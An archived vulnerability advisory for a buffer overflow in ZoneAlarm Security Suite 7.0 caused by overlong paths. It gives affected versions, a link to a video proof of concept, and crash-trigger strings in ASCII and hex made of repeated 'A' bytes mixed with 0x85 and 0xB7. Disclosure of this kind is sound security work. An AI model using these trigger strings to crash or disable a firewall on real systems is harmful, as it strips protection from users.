TUCoPS :: Security App Flaws :: va1237.htm

ZoneAlarm Security Suite buffer overflow
ZoneAlarm Security Suite buffer overflow
ZoneAlarm Security Suite buffer overflow



Application: ZoneAlarm Security Suite
OS: Windows Xp (All patches a day)
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT
------------------------------------------------------
Description

The zonealarm is a known firewall,
which in the version "security suite" brings some tools as an antivirus, antispam and so on.

=09
Details of the version

ZoneAlarm Security Suite versi=F3n:7.0.483.000
Versi=F3n de TrueVector:7.0.483.000
Versi=F3n del controlador:7.0.483.000
Versi=F3n de motor anti-virus:3
Versi=F3n de motor antivirus:5.0.1.85
Versi=F3n de archivo DAT de firma de anti-virus 915051681
Versi=F3n de motor de protecci=F3n contra programas esp=EDa:5.0.189.0
Versi=F3n de archivo DAT de firma de protecci=F3n contra programas esp=EDa 01.200801.3195
Versi=F3n de AntiSpam 5.0.6.8903


------------------------------------------------------
Vulnerability

The vulnerability is caused because the program can not analyze very long paths.
This causes a buffer overflow with the possibility of execution of code.

The flaw could be exploited by malware to leave without protection to the system for instance.
=09
------------------------------------------------------
POC/EXPLOIT

=09
Here you can view a video proof of concept

http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf 


Strings


ASCII: =B7 =85  AAAAAAAAAAAAAAAAAAA =B7 =85  AAAAAAAAAAAAAAAAAAA =B7 =85  AAAAAAAAAAAAAAAAAAA =B7 =B7 =85  AAAAAAAAAAAAAAAAAAA =B7 =85  AAAAAAAAAAAAAAAAAAA =B7 =85  AAAAAAAAAAAAAAAAAAA =B7 =B7 =85  A =B7 =85  AAAAAAAAAAAAAAAAAAA =B7 =85  AAAAAAAAAAAAAAAAAAA

HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41


ASCII: =85=85=85=85=85=85=85=85=85=85=85AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=85=85=85=85AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41




------------------------------------------------------
Juan Pablo Lopez Yacubian

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH